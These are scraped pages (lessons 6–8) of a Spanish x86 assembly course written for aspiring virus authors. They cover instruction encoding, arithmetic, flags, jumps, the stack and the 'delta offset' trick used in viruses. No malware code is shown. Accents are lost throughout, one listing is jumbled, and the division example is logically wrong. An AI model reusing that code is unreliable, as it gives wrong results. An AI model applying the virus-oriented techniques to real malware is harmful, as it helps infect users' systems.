-MOVZX (MOV with Zero Extend): Realiza la funcin del MOV, aadiendo ceros al operando de destino. Esto es, que si hacemos un MOVZX EDX, AL y AL vale 80h, EDX valdr 00000080h, dado que el resto se ha rellenado con ceros.
-MOVSX (MOV with Sign Extend): Esta forma lo que hace es, en lugar de 0s, poner 0s o 1s dependiendo del bit ms significativo del operando de mayor tamao. Es decir, si en este MOVSX EDX, AL se da que el bit ms significativo de AL es 1 (por ejemplo, AL = 10000000b = 80h), se rellenar con 1s (en este caso, EDX valdra FFFFFF80h). Si el bit ms significativo es 0 (por ejemplo, AL = 01000000b = 40h), se rellenar con 0s ( EDX ser pues 00000040h).
6 - Ensamblador II
Curso gratis creado por Wintermute . 22 Febrero 2006 Excel avanzado - Arequipa Convirtete en un Experto en MS Excel. Inicio 20 de Junio www.bsgrupo.com Anuncios Google
< anterior | 1 .. 4 5 6 7 8 .. 18 | siguiente >
MOVs condicionales Una nueva caracterstica presente a partir de algunos modelos de Pentium Pro y en siguientes procesadores de Intel, y en AMD a partir de K7 y posiblemente K6-3, son los MOVs condicionales; esto es, que se realizan si se cumple una determinada condicin. La instruccin es CMOVcc, donde "cc" es una condicin como lo es en los saltos condicionales (ver ms adelante), p.ej CMOVZ EAX, EBX. No obstante, de momento no recomendara su implementacin; aunque terriblemente til, esta instruccin no es standard hasta en procesadores avanzados, y podra dar problemas de compatibilidad. Para saber si el procesador tiene disponible esta operacin, podemos ejecutar la instruccin CPUID, la cual da al programador datos importantes acerca del procesador que est corriendo el programa, entre otras cosas si los MOVs condicionales son utilizables. Codificacin de una instruccin Ahora que ya sabemos utilizar nuestra primera instruccin en lenguaje ensamblador puede surgir una duda: cmo entiende esta instruccin el procesador?. Es decir, evidentemente nosotros en la memoria no escribimos las palabras "MOV EAX, EBX", sin embargo esa instruccin existe. Cmo se realiza pues el paso entre la instruccin escrita y el formato que la computadora sea capaz de entender?. En un programa, el cdigo es indistinguible de los datos; ambos son ristras de bits si no hay nadie all para interpretarlos; el programa ms complejo no tendra sentido sin un procesador para ejecutarlo, no sera ms que una coleccin de unos y ceros sin sentido. As, se establece una convencin para que determinadas cadenas de bits signifiquen cosas en concreto. Por ejemplo, nuestra instruccin "MOV EAX, EBX" se codifica as: 08Bh, 0C3h
Supongamos que EIP apunta justo al lugar donde se encuentra el 08Bh. Entonces, el procesador va a leer ese byte (recordemos que cada cifra hexadecimal equivale a 4 bits, por tanto dos cifras hexadecimales son 8 bits, o sea, un byte). Dentro del micro se interpreta que 08Bh es una instruccin MOV r32,r/m32. Es decir, que dependiendo de los bytes siguientes se va a determinar a qu registro se va a mover informacin, y si va a ser desde otro registro o desde memoria. El byte siguiente, 0C3h, indica que este movimiento se va a producir desde el registro EBX al EAX. Si la instruccin fuera "MOV EAX, ECX", la codificacin sera as: 08Bh, 0C1h Parece que ya distinguimos una lgica en la codificacin que se hace para la instruccin "MOV EAX,algo". Al cambiar EBX por ECX, slo ha variado la segunda cifra del segundo byte, cambiando un 3 por un 1. Podemos suponer entonces que se est haciendo corresponder al 3 con EBX, y al 1 con ECX. Si hacemos ms pruebas, "MOV EAX,EDX" se codifica como 08Bh, 0C2h. "MOV EAX,ESI" es 08BH, 0C6h y "MOV EAX,EAX" (lo cual por cierto no tiene mucho sentido), es 08Bh, 0C0h. Vemos pues que el procesador sigue su propia lgica al codificar instrucciones; no es necesario que la entendamos ni mucho menos que recordemos su funcionamiento. Sencillamente merece la pena comprender cmo entiende aquello que escribimos. Para nosotros es ms fcil escribir "MOV EAX, EBX" puesto que se acerca ms a nuestro lenguaje; MOV recuerda a "movimiento", al igual que "ADD" a aadir o "SUB" a restar. Al computador "MOV" no le recuerda nada, as que para l resulta mucho mejor interpretar secuencias de nmeros; la equivalencia entre nuestro "MOV EAX,EBX" y su "08Bh, 0C3h" es exacta, la traduccin es perfecta y procesador y humano quedan ambos contentos. El sentido pues de este apartado es entender cmo va a funcionar cualquier programa que escribamos en lenguaje ensamblador; cuando escribamos nuestros programas, utilizaremos un compilador: una especie de traductor entre la notacin en ensamblador que ms se parece a nuestro lenguaje con instrucciones como "MOV EAX, EBX" y la notacin en bits, la que la mquina entiende directamente. En realidad, podramos considerar que ambos son el mismo lenguaje; la nica diferencia es la forma de representarlo. Por supuesto, quien quiera meterse ms a fondo en esto puede disfrutar construyendo instrucciones por s mismo jugando con estos bytes; es algo interesante de hacer en virus cuando tenemos engines polimrficos, por ejemplo. Hay, de hecho, listas muy completas acerca de cmo interpretar la codificacin en bits que entiende la mquina, que pueden ser consultadas sin problemas (en la propia web de Intel vienen toda una serie de tablas indicando cmo se hace esto con todas y cada una de las instrucciones que entienden sus procesadores). Las operaciones lgicas Las operaciones con registros se dividen en dos tipos: aritmticas y lgicas. A las aritmticas estamos muy acostumbradas, y son la suma, la resta, multiplicacin, divisin...
las lgicas operan a nivel de bit, lo que las distingue de las aritmticas (si "a nivel de bit" resulta algo oscuro, da igual, seguid leyendo). Aunque hayamos mencionado cules son estas operaciones lgicas en el primer captulo, volvemos a repasarlas una a una y con detalle: AND El AND lgico realiza bit a bit una operacin consistente en que el bit resultado es 1 slo si los dos bits con los que se opera son 1. Equivale a decir que el resultado "es verdad" si lo son los dos operandos. Actuar as con cada uno de los bits de los dos operandos, almacenando en el de destino el resultado. Por ejemplo: 10001010 AND 11101010 10001010 La forma de utilizar el AND es muy similar al MOV que ya hemos visto; algunas formas de utilizarlo podran ser //AND EAX,EBX//, o //AND EAX,[1234h]//, o //AND ECX,[EDX]//, etc. El resultado se almacena en el operando de destino, esto es, EAX en los dos primeros casos y ECX en el tercero. OR El OR lgico tambin opera bit a bit, poniendo el resultado a 1 si al menos uno de los dos bits con los que operamos estn a 1, siendo lo mismo que decir que el resultado es "cierto" si lo es al menos uno de sus constituyentes. Almacenar, como el AND, el resultado en el operando de destino: 10001010 OR 11101010 11101010 La forma de utilizarlo es el comn a todas las operaciones lgicas, como el AND mencionado anteriormente. XOR La operacin XOR, operando bit a bit, da como resultado un 1 si uno y slo uno de los dos bits con los que se opera valen 1, es por ello que se llama OR exclusivo o eXclusive OR: 10001010 XOR 11101010 01100000
NOT Esta operacin slo tiene un operando, puesto que lo que hace es invertir los bits de este operando que evidentemente ser de destino: NOT 11101010 00010101 Operaciones aritmticas En los procesadores 80x86, tenemos una buena gama de operaciones aritmticas para cubrir nuestras necesidades. Estas son, bsicamente: ADD ADD significa aadir. Tendremos con esta instruccin las posibilidades tpicas de operacin; sobre memoria, sobre registros, y con valores inmediatos (recordando que no podemos operar con dos posiciones de memoria y que el destino no puede ser un valor inmediato). As, un ejemplo sera: ADD EAX, 1412h Algo tan sencillo como esto aade 1412h hexadecimal a lo que ya hubiera en EAX, conservando el resultado final en EAX. Por supuesto podemos usar valores decimales (si quitamos la h a 1412h, sumar 1412h decimal... creo que no lo mencion, pero esto vale siempre, tanto para MOV como para cualquier otra operacin lgica o aritmtica). Otros ejemplos podran ser //ADD ECX, EDI// (sumar ECX y EDI y almacenar el resultado en ECX), //ADD dword ptr [EDX], ESI// (coger lo que haya en la direccin de memoria cuyo valor indique EDX, sumarle el valor del registro ESI y guardar el resultado en esa direccin de memoria), etc. SUB Esta es la operacin de resta; las reglas para utilizarla, las mismas que las del ADD. Tan slo cabra destacar el hecho de que si estamos restando un nmero mayor a uno menor, adems de una modificacin en los FLAGS para indicar que nos hemos pasado, lo que suceder es que al llegar a 0000 en el resultado el siguiente nmero ser FFFF. Es decir, que al pasarnos por abajo del todo el resultado comienza por arriba del todo. Supongamos que queremos restar 1 - 2. El resultado no es -1, sino el mximo nmero representable por la cantidad de bits que tuviramos. Vamos, que si son 8 bits (que representan un valor entre 0 y 255), el resultado de 1 - 2 ser 255. Para los curiosos, este 255 en complemento a 2 equivale al -1, por lo que si operamos en este complemento a 2 la operacin de resta tiene completo sentido para los nmeros negativos. Lo mismo sirve para el ADD cuando sumamos dos nmeros y el resultado no es representable con el nmero de bits que tenemos. Si hicieramos 255 + 1 y el mximo
representable fuera 255 (o FFh en hexadecimal, usando 8 bits), el resultado de 255 + 1 sera 0. Como deca, las posibilidades para usar el SUB son como las del ADD, con lo que tambin es vlido esto: SUB EAX, 1412h Los ejemplos mencionados con el ADD tambin valen: //SUB dword ptr [EDX], ESI// va a restar al contenido de la direccin de memoria apuntada por EDX el valor almacenado en ESI, y el resultado se guardar en esta direccin [EDX]. //SUB ECX, EDI// restar al valor de ECX el de EDI, guardando el resultado en el registro ECX. MUL Pasamos a la multiplicacin; aqu el tratamiento es un tanto distinto al que se haca con la suma y la resta. Slo vamos a indicar un parmetro que va a ser un registro o una direccin de memoria, y segn su tamao se multiplicar por el contenido de AL (8 bits), AX (16) o EAX (32). El resultado se guardar entonces en AX si se multiplic por AL, en DX:AX si se multiplic por AX, y en EDX:EAX si se multiplic por EAX. Como vemos se utiliza para guardar el resultado el doble de bits que lo que ocupan los operandos; as no se pierde informacin si sale un nmero muy grande. Veamos un ejemplo por cada tamao: MUL CL: Coge el valor de CL, lo multiplica por AL, y guarda el resultado en AX. MUL word ptr [EDX]: Obtiene los 16 bits presentes en la direccin de memoria EDX (ojo, que el tamao de lo que se escoge lo indica el "word ptr", EDX slo indica una direccin con lo que aunque sean 32 bits esto no influye, el tamao, repito, es determinado por el "word ptr"). Una vez coge esos 16 bits los multiplica por AX, y el resultado se va a guardar en DX:AX. Esto significa, que los 16 bits ms significativos los guarda en DX y los 16 menos significativos en AX. Si el resultado de la multiplicacin fuera //12345678h//, el registro DX contendra //1234h//, y el registro AX, //5678h//. MUL ESI: Coge el contenido del registro ESI, y lo multiplica por EAX. El resultado es almacenado en EDX:EAX del mismo modo en que antes se haca con DX:AX, slo que esta vez tenemos 64 bits para guardarlo. La parte de ms peso, ms significativa, se guardar en EDX, mientras que la de menor peso ser puesta en EAX. Si el resultado de ESI x EAX fuera //1234567887654321h//, EAX contendra //87654321h// y EDX //12345678h. // DIV Por suerte, aunque a quien se le ocurri esto de los nombres de las instrucciones fuera anglosajn, siguen parecindose bastante al castellano; la instruccin DIV es la que se dedica a la divisin entre nmeros.
El formato de esta instruccin es muy similar al MUL, y va a tener tambin tres posibilidades, con 8, 16 y 32 bits. En ellas, AX, AX:DX o EAX:EDX van a dividirse por el operando indicado en la instruccin, y cociente y resto van a almacenarse en AL y AH, AX y DX o EAX y EDX, respectivamente: DIV CL: Se divide el valor presente en AX por CL. El cociente de la divisin se guardar en AL, y el resto en AH. Si tenamos CL = 10 y AL = 6, al finalizar la ejecucin de esta instruccin tendremos que CL no ha variado y que AH = 4 mientras que AL = 1. DIV BX: Se divide el valor de DX:AX por el de BX. El cociente que resulte de esto se guardar en AX, mientras que el resto ir en DX. El dividendo (DX:AX) est formado de la misma manera en que lo estaba el un MUL el resultado de una operacin: la parte ms "grande", los bits ms significativos, irn en DX mientras que los menos significativos irn en AX. DIV dword ptr [EDI]: El valor contenido en la combinacin EDX:EAX (64 bits) se dividir por los 32 bits que contiene la direccin de memoria EDI; el cociente de la divisin se va a guardar en EAX, y el resto en EDX. INC y DEC Tan sencillo como INCrementar y DECrementar. Estas dos instrucciones slo tienen un operando que hace al tiempo de origen y destino, y lo que hacen con l es "sumar uno" o "restar uno": INC AX: Coge el contenido de AX, le suma 1 y almacena el resultado en AX DEC dword ptr [EDX]: Obtiene el valor de la posicin de memoria a la que apunta EDX, le resta 1 y almacena all el resultado. INC y DEC, como veremos cuando lleguemos a los saltos condicionales, se suelen utilizar bastante para hacer contadores y bucles; podemos ir decrementando el valor de un registro y comprobar cuando llega a cero, para repetir tantas veces como indique ese contador un trozo de cdigo, una operacin en particular. Ejecutable, Windows), tenemos el WinDasm, que tiene bastante bien organizado todo el tema de tablas de importaciones, exportaciones y dems cositas de este tipo de formato. De nuevo, os remito a la pgina de Darknode para obtenerlos, en esa seccin de "Other virus related stuff". Por ltimo, hay otro tipo de utilidad que nos puede servir, que son los visores hexadecimales. En cierto modo son como debuggers pero que no desensamblan las instrucciones, simplemente nos muestran sus valores hexadecimales y ascii (como la ventana de abajo del Turbo Debugger, si recordis). Algunos tienen alguna opcin maja, aparte que para comprobar algunas cosas rpidamente suelen ser tiles. Mi consejo, pues
bajo Linux el BIEW (http://biew.sourceforge.net/), y aunque no tengo URL de referencia (probar DarkNode), para Windows el HIEW o el viejo DiskEdit de las Norton Utilities.
7 - Ensamblador III
Curso gratis creado por Wintermute . 22 Febrero 2006 EXCEL Para Profesionales Aprende Online la herramienta para mejorar tu productividad. Mayo www.bsgrupo.com Anuncios Google
< anterior | 1 .. 5 6 7 8 9 .. 18 | siguiente >
""
Registro de estado (FLAGS) e instrucciones de comparacin
Flags
Como ya vimos, hay un registro bastante especial que es el de flags; la traduccin literal de esta palabra es "bandera", y lo que significa realmente es que no se toma el valor de este registro como una cantidad en s misma, sino que cada uno de sus bits significa algo en particular segn su valor sea 0 o 1. El registro EFLAGS, de 32 bits, tiene como bits ms importantes los 16 menos significativos (EFLAGS viene de Extended Flags, se aadieron 16 bits para indicar algunas otras cosas).
La forma de acceder a estos registros ser de forma implcita cuando hagamos saltos condicionales (por ejemplo, hemos hecho una comparacin entre dos trminos y saltamos si son iguales; la instruccin JE, Jump if Equal, comprobar por si misma el ZF o Zero Flag para ver si ha de saltar o no), y de forma explcita con funciones de pila como PUSHF, POPF, PUSHFD y POPFD, que sern explicadas en el apartado referente a la pila. De todas formas, indicar ya que los nicos bits que se pueden modificar con un POPF son los 11, 10, 8, 7, 6, 4, 2 y 0 (y los 12 y 13 si tenemos IOPL = 0, es decir, nivel de administrador... estos 12 y 13 indican el nivel de ejecucin del procesador).
Los bits que tienen puestos un "0" como indicador, no tienen funcin definida y conservan siempre ese valor 0 (tambin sucede con el bit 1, que est a 1). Los ms importantes, los vemos a continuacin:
- IOPL (12 y 13): IOPL significa "I/O priviledge level", es decir, el nivel de privilegio en que estamos ejecutando. Recordemos que normalmente vamos a tener dos niveles de privilegio que llamabamos de usuario y supervisor, o ring3 y ring0. Aqu podemos ver en cul estamos; si los dos bits estn activos estamos en ring3 o usuario, y si estn inactivos, en ring0 (slo pueden modificarse estos bits de los flags si estamos en ring0, por supuesto).
-IF (9): El "Interrupt Flag", controla la respuesta del procesador a las llamadas de interrupcin; normalmente est a 1 indicando que pueden haber interrupciones. Si se pone a 0 (poner a 0 se hace directamente con la instruccin CLI (Clear Interrupts), mientras que STI (Set Interrupts) lo activa), se prohibe que un tipo bastante amplio de interrupciones pueda actuar mientras se ejecuta el cdigo del programa (viene bien en algunas ocasiones en que estamos haciendo algo crtico que no puede ser interrumpido).
-ZF (6): El Zero Flag, indica si el resultado de la ltima operacin fue 0. Tngase en cuenta que si hemos hecho una comparacin entre dos trminos, se tomar como si se hubiera hecho una operacin de resta; as, si los dos trminos son iguales (CMP EAX, EBX donde EAX = EBX p.ej), se dar que el resultado de restarlos es 0, con lo que se activar el flag (se pondr a 1). Tal y como sucede con CF y OF, este flag es afectado por operaciones aritmticas (ADD, SUB, etc) y de incremento/decremento (INC/DEC).
-CF (0): Carry Flag o Flag de Acarreo. En ocasiones se da un desbordamiento en la operacin aritmtica, esto es, que no cabe. Si nos pasamos por arriba o por abajo en una operacin (p.ej, con 16 bits hacer 0FFFFh
+ 01h), este resultado no va a caber en un destino de 16 bits (el resultado es 10000h, lo cual necesita 17 bits para ser codificado). As pues, se pone este flag a 1. Hay tambin un flag parecido, OF (11) (Overflow Flag), que acta cuando en complemento a 2 se pasa del mayor nmero positivo al menor negativo o viceversa (por ejemplo, de 0FFFFh a 0000h o al revs). Tambin nos interesar para ello el SF (7) o flag de signo, que estar activo cuando el nmero sea negativo segn la aritmtica de complemento a dos (en realidad, cuando el primer bit del resultado de la ltima operacin sea un 1, lo que en complemento a 2 indica que se trata de un nmero negativo).
Otros, de menor importancia (se puede uno saltar esta parte sin remordimientos de conciencia), son:
-ID (21): El Identification Flag, seala si se puede modificar que se soporta la instruccin CPUID
-VM (17): Este flag controla si se est ejecutando en Virtual Mode 8086; cuando est a 0 se vuelve a modo protegido (el modo virtual 8086 se usa por ejemplo para ejecutar las ventanas Ms-Dos bajo Win32).
-DF(10): El "Direction Flag", va a indicar en qu direccin se realizan las instrucciones de cadena (MOVS, CMPS, SCAS, LODS y STOS). Estas instrucciones, que veremos ms adelante, actan normalmente "hacia adelante". Activar este flag har que vayan "hacia atrs"; no hace falta preocuparse ms por esto, ya se recordar. Tan slo aadir, que este bit se activa directamente con la instruccin STD (Set Direction Flag), y se desactiva (se pone a 0) con la instruccin CLD (Clear Direction Flag).
-TF (8): Es el "Trap Flag" o flag de trampa; se utiliza para debugging, y cuando est activo, por cada instruccin que el procesador ejecute saltar una interrupcin INT 1 (se utiliza para depuracin de programas).
-AF (4): Flag de acarreo auxiliar o "Adjust Flag". Se usa en aritmtica BCD; en otras palabras, pasad de l ;=)
-PF (2): Es el flag de paridad; indica si el resultado de la ltima operacin fue par, activndose (ponindose a 1) cuando esto sea cierto.
-VIP (20), VIF (19), RF (16), NT(14): No nos van a resultar muy tiles; para quienes busquen una referencia, sus significados son "Virtual Interrupt Pending", "Virtual Interrupt Flag", "Resume Flag" y "Nested Task".
Instrucciones de comparacin
Los flags son activados tanto por las instrucciones de operacin aritmtica (ADD, SUB, MUL, DIV, INC y DEC) como por otras dos instrucciones especficas que describo a continuacin:
-CMP: Esta es la ms importante; el direccionamiento (es decir, aquello con lo que se puede operar) es el mismo que en el resto, y lo que hace es comparar dos operandos, modificando los flags en consecuencia. En realidad, acta como un SUB slo que sin almacenar el resultado pero s modificando los flags, con lo que si los dos operandos son iguales se activar el flag de cero (ZF), etc. No vamos a necesitar recordar los flags que modifican, puesto que las instrucciones de salto condicional que usaremos operarn directamente sobre si el resultado fue "igual que", "mayor que", etc, destaquemos no obstante que los flags que puede modificar son OF (Overflow), SF (Signo), ZF (Cero), AF (BCD Overflow), PF (Parity) y CF (Carry).
-TEST: Tal y como CMP equivale a un SUB sin almacenar sus resultados, TEST es lo mismo que un AND, sin almacenar tampoco resultados pero s modificando los flags. Esta instruccin, slo modifica los flags SF (Signo), ZF (Cero) y PF (Paridad).
La ejecucin de un programa en ensamblador no suele ser lineal por norma general. Hay ocasiones en las que querremos utilizar "saltos" (que cambien el valor del registro EIP, es decir, el punto de ejecucin del programa).
La instruccin JMP es la que se utiliza para un salto no condicional; esto, significa que cuando se ejecuta una instruccin JMP, el registro EIP que contiene la direccin de la siguiente instruccin a ejecutar va a apuntar a la direccin indicada por el JMP.
-Salto cercano o Near Jump: Es un salto a una instruccin dentro del segmento actual (el segmento al que apunta el registro CS).
-Salto lejano o Far Jump: Se trata de un salto a una instruccin situada en un segmento distinto al del segmento de cdigo actual.
-Cambio de Tarea o Task Switch: Este salto se realiza a una instruccin situada en una tarea distinta, y slo puede ser ejecutado en modo protegido.
Cuando estemos programando, lo normal es que utilicemos etiquetas y saltos cercanos. En todo compilador, si escribimos la instruccin "JMP ", al compilar el fichero la etiqueta ser sustituida por el valor numrico de la direccin de memoria en que se encuentra el lugar donde queremos saltar.
Un "Jcc" es un "Jump if Condition is Met". La "cc" indica una condicin, y significa que debemos sustituirlo por las letras que expresen esta condicin.
Cuando el procesador ejecuta un salto condicional, comprueba si la condicin especificada es verdadera o falsa. Si es verdadera realiza el salto como lo haca con una instruccin JMP, y en caso de ser falsa simplemente ignorar la instruccin.
A continuacin se especifican todos los posibles saltos condicionales que existen en lenguaje ensamblador. Algunas instrucciones se repiten siendo ms de una forma de referirse a lo mismo, como JZ y JE que son lo mismo (Jump if Zero y Jump if Equal son equivalentes). En cualquier caso hay que tener lo siguiente en cuenta:
-Las instrucciones de salto condicional ms comunes son JE (Jump if Equal), JA (Jump if Above) y JB (Jump if Below), as como las derivadas de combinar estas (por ejemplo, una N entre medias es un Not, con lo que tenemos JNE, JNA y JNB... por otro lado, tenemos JAE como Jump if Above or Equal o JBE, Jump if Below or Equal)
-Puede resultar extrao el hecho de que hay dos formas de decir "mayor que" y "menor que". Es decir, por un lado tenemos cosas como JB (Jump if Below) y por otro JL (Jump if Less). La diferencia es que Below y Above hacen referencia a aritmtica sin signo, y Less y Greater hacen referencia a aritmtica en complemento a dos.
-Hay un tercer tipo de salto condicional, que comprueba directamente el estado de los flags (como pueda ser el de paridad). Entre ellos inclumos tambin dos especiales; uno que considera si salta dependiendo de si el valor del registro CX es 0 (JCXZ) y otro que considera si el valor de ECX es 0 (JECXZ).
Instruccin
Descripcin
Flags
JZ, JE
ZF = 1
JNE, JNZ
ZF = 0
JA
Jump if Above
CF = 0 and ZF = 0
JNA, JBE
CF = 1 or ZF = 1
JNBE
CF = 0 and ZF = 0
Aritmtica en complemento a 2
JNAE, JB, JC
JGE, JNL
SF = OF
JL, JNGE
SF <> OF
JLE, JNG
ZF = 1 or SF <> OF
JNG, JLE
ZF = 1 or SF <> OF
JNGE, JL
SF <> OF
JNL, JGE
SF = OF
JNLE, JG
ZF = 0 and SF = OF
JNO
OF = 0
JNP
PF = 0
JNS
SF = 0
JO
Jump if Overflow
OF = 1
JP, JPE
PF = 1
JPO
PF = 0
JS
Jump if Sign
SF = 1
JCXZ
Jump if CX is 0
CX = 0
JECXZ
Jump if ECX is 0
ECX = 0
""
8 - Ensamblador IV
Curso gratis creado por Wintermute . 22 Febrero 2006 Doctorado a Distancia Obtenga su Doctorado a distancia Estudios universitarios a distancia www.aiu.edu Anuncios Google
< anterior | 1 .. 6 7 8 9 10 .. 18 | siguiente >
""
Ejemplo de programacin con saltos condicionales
A estas alturas del curso de ensamblador, creo que estamos abusando mucho de la teora; ciertamente esto es ante todo teora, pero no est de ms ver un ejemplo prctico de programa en el que usamos saltos condicionales y etiquetas. El programa escrito a continuacin, imita una operacin de multiplicacin utilizando tan slo la suma, resolvindolo mediante el algoritmo de que N * M es lo mismo que (N+N+N+...+N), M veces:
; Suponemos que EAX contiene N, y EBX, contiene M. xor edx,edx ; Aqu vamos a almacenar el resultado final. La operacin xor edx,edx hace EDX = 0. LoopSuma: ; Esto, es una etiqueta add edx,eax ; A EDX, que contendr el resultado final, le sumamos el primer multiplicando dec ebx jnz LoopSuma ; Si el resultado de decrementar el multiplicando EBX es cero, no sigue sumando el factor de EAX.
Un programa tan sencillo como este, nos dar en EDX el producto de EAX y EBX. Veamos uno anlogo para la divisin:
; Suponemos que EAX contiene el dividendo y EBX el resto. xor ecx,ecx ; ecx contendr el cociente de la divisin xor edx,edx ; edx va a contener el resto de la divisin RepiteDivision: inc ecx ; incrementamos en 1 el valor del cociente que queremos obtener sub eax,ebx ; al dividendo le restamos el valor del divisor cmp eax,ebx ; comparamos dividendo y divisor jna RepiteDivision ; si el divisor es mayor que el dividendo, ya hemos acabado de ver el cociente mov edx,eax
Se ve desde lejos que este programa es muy optimizable; el resto quedaba en EAX, con lo que a no ser que por algn motivo en particular lo necesitemos en EDX, podramos prescindir de la ltima lnea y hacer que el cociente residiera en ECX mientras que el resto sigue en EAX. Tambin sera intil, la lnea "xor edx,edx" que pone EDX a cero, dado que luego es afectado por un "mov edx,eax" y da igual lo que hubiera en EDX.
Hemos visto, adems, cmo hacer un bucle mediante el decremento de una variable y su comprobacin de si llega a cero, y en el segundo caso, mediante la comprobacin entre dos registros; para el primer caso vamos a tener en el ensamblador del PC un mtodo mucho ms sencillo utilizando ECX como contador como va a ser el uso de la instruccin LOOP, que veremos ms adelante, y que es bastante ms optimizado que este decremento de a uno.
La pila
La pila es una estructura de datos cuya regla bsica es que "lo primero que metemos es lo ltimo que sacamos". El puntero que indica la posicin de la pila en la que estamos es el SS:ESP, y si pudiramos verlo grficamente sera algo como esto:
Qu significa este dibujo? Que SS:ESP est apuntando a ese byte de valor 91h; los valores que vienen antes no tienen ninguna importancia (y dado que esta misma pila es utilizada por el sistema operativo cuando se produce una interrupcin, es improbable que podamos considerar "fijos" estos valores que hayan en el lugar de las interrogaciones).
La primera instruccin que vamos a ver y que opera sobre la pila, es el PUSH, "empujar". Sobre el dibujo, un PUSH de 32 bits (por ejemplo un PUSH EAX) ser una instruccin que mover "hacia atrs" el puntero de pila, aadiendo el valor de EAX all. Si el valor del registro EAX fuera de 0AABBCCDDh, el resultado sobre esta estructura de un PUSH EAX sera el siguiente:
Un par de cosas a notar aqu: por una parte s, el puntero se ha movido slo (y seguir movindose hacia la izquierda - hacia "atrs" - si seguimos empujando valores a la pila). Por otra, quiz resulte extrao que AABBCCDDh se almacene como DDh, CCh, BBh, AAh, es decir, al revs. Pero esto es algo comn; cuando guardamos en alguna posicin de memoria un dato mayor a un byte (este tiene cuatro), se van a almacenar "al revs"; este tipo de ordenacin, se
llama little endian, opuesta a la big endian que almacena directamente como AAh BBh CCh DDh un valor as.
La instruccin PUSH, en cualquier caso, no est limitada a empujar el valor de un registro: puede empujarse a la pila un valor inmediato (p.ej, PUSH 1234h), y pueden hacerse referencias a memoria, como PUSH [EBX+12].
Otra instruccin bastante importante es PUSHF (y PUSHFD), que empujan el contenido del registro de Flags en la pila (un buen modo de que lo podamos sacar a un registro y lo analicemos). Como se indica en el grfico de los Flags en su captulo correspondiente, PUSHFD empuja los EFlags (flags extendidos, 32 bits), y PUSHF los Flags (los 16 bits menos significativos de este registro).
Ahora, no slo querremos meter cosas en la pila, estara interesante poder sacarlas y tal. Para ello, tambin tenemos una instruccin, el POP, que realiza la accin exctamente opuesta al PUSH. En particular, va a aumentar el puntero ESP en cuatro unidades y al registro o posicin donde se haga el POP, transferir los datos a los que se apuntaba. En el caso anterior, volveramos a tener el puntero sobre el 91h:
Ya no podemos fiarnos de que el contenido de posiciones anteriores sigue siendo DDh,CCh,BBh,AAh. En cuanto el procesador haga una interrupcin va a usar la pila para almacenar datos, luego sern sobreescritos. Si nuestra rden hubiera sido un POP ECX, ahora ECX contendra el valor 0AABBCCDDh.
Otra cosa a tener en cuenta, es que la pila no es ms que una estructura fabricada para hacernos ms fcil la vida; pero no es una entidad aparte, sigue estando dentro de la memoria principal. Por ello, adems de acceder a ella mediante ESP, podramos acceder con cualquier otro registro sin tener que utilizar las rdenes PUSH/POP. Esto no es usual, pero es bueno saber al menos que se puede hacer. Si en una situacin como la del ltimo dibujo hacemos un MOV EBP, ESP y un MOV EAX, SS:[EBP], el registro EAX pasar a valer 07A5F0091h.
Destacan tambin otras dos instrucciones: PUSHA y POPA. Estas instrucciones lo que hacen es empujar/sacar mltiples registros (por si tenemos que salvarlos todos, resultara un coazo salvarlos uno a uno). Exctamente, estas dos instrucciones afectan a EAX, EBX, ECX, EDX, EBP, ESI y EDI.
Subrutinas
Es bastante comn utilizar subrutinas al programar; podemos verlas como el equivalente a las funciones, de tal forma que se puedan llamar desde cualquier punto de nuestro programa. Supongamos que nuestro programa tiene que recurrir varias veces a un mismo cdigo dedicado, por ejemplo, a averiguar el producto de dos nmeros como hacamos en el ejemplo de cdigo anterior (vale, el ensamblador del 80x86 admite multiplicacin, pero repito que esto es un ejemplo :P).
La instruccin que vamos a utilizar para "llamar" a nuestra funcin de multiplicar, es el CALL. CALL admite, como es habitual, referencias directas a memoria, a contenidos de registros y a contenidos de direcciones de memoria apuntadas por registros. Podramos hacer un CALL EAX, un CALL [EAX] o directamente un CALL 12345678h. Al programar, utilizaremos normalmente un CALL , que ya se encargar el compilador de traducir a direccin inmediata de memoria.
Luego, dentro de la propia rutina tenemos que devolver el control al cdigo principal del programa, esto es, al punto en el que se haba ejecutado un CALL. Esto se hace mediante la instruccin RET, que regresar al punto en que se llam ejecutndose despus la instruccin que venga a continuacin.
> mov eax,<valor1> mov ebx,<valor2> call Producto > [...] ; Suponemos que EAX contiene N, y EBX, contiene M.
Producto:
xor edx,edx = 0.
; Aqu vamos a almacenar el resultado final. La operacin xor edx,edx hace EDX
LoopSuma:add ; Esto, es una etiqueta ; A EDX, que contendr el resultado final, le sumamos el edx,eax dec primer multiplicando ebx
jnz LoopSuma ; Si el resultado de decrementar el multiplicando EBX es cero, no sigue sumando el factor de EAX.
Cuando llamamos a una subrutina, en realidad internamente est pasando algo ms que "pasamos el control a tal punto"; pensemos que se pueden anidar todas las subrutinas que queramos, es decir, que pueden hacerse CALLs dentro de CALLs sin ningn problema.
Por qu? Pues por la forma en que funcionan especficamente estas instrucciones: -CALL, lo que realmente est haciendo es empujar a la pila la direccin de ejecucin de la instruccin siguiente al CALL, y hacer un JMP a la direccin indicada por el CALL. As, al inicio de la subrutina la pila habr cambiado, y si hiciramos un POP , sacaramos la direccin siguiente a la de desde donde se llam.
-RET, lo que va a hacer es sacar de la pila el ltimo valor que encuentre (ntese que no sabe que ese sea el correcto, con lo que si en medio de la subrutina hacemos un PUSH o un POP sin controlar que est todo al final tal y como estaba al principio, el programa puede petar), y saltar a esa direccin. En caso de que no hayamos hecho nada malo, va a volver donde nosotros queramos.
Jugar con esto nos va a ser muy necesario cuando programemos virus. Hay un sistema muy standard de averiguar la direccin actual de memoria en que se est ejecutando el programa (y que es necesario utilizar normalmente, a no ser que lo hagamos por algn otro mtodo), que funciona como sigue:
call delta_offset ; normalmente este mtodo se llama "delta offset", que hace referencia a esta direccin. delta_offset: pop ebp ; Ahora ebp tiene la direccin de memoria indicada por "delta_offset" en el momento actual.
No abundar en ms detalles; slo, que esta es la mejor forma de saber cunto vale el registro EIP, lo cual nos va a ser de bastante utilidad al programar.
Para terminar, tenemos que hablar de la existencia de otra forma de RET que es IRET, retorno de interrupcin; la trataremos en el siguiente apartado junto con el uso de interrupciones por ser un tanto especial.
Por otro lado, a veces veremos una opcin que puede parecernos "extraa", y es que a veces el RET viene acompaado de un nmero, por ejemplo, RET 4. El nmero que viene junto con la instruccin, indica que adems de sacar el valor de retorno de la pila tenemos que aumentar el valor del puntero de pila en tantas unidades como se indique (tngase en cuenta que 4, p.ej, representan 32 bits, o sea, un registro).
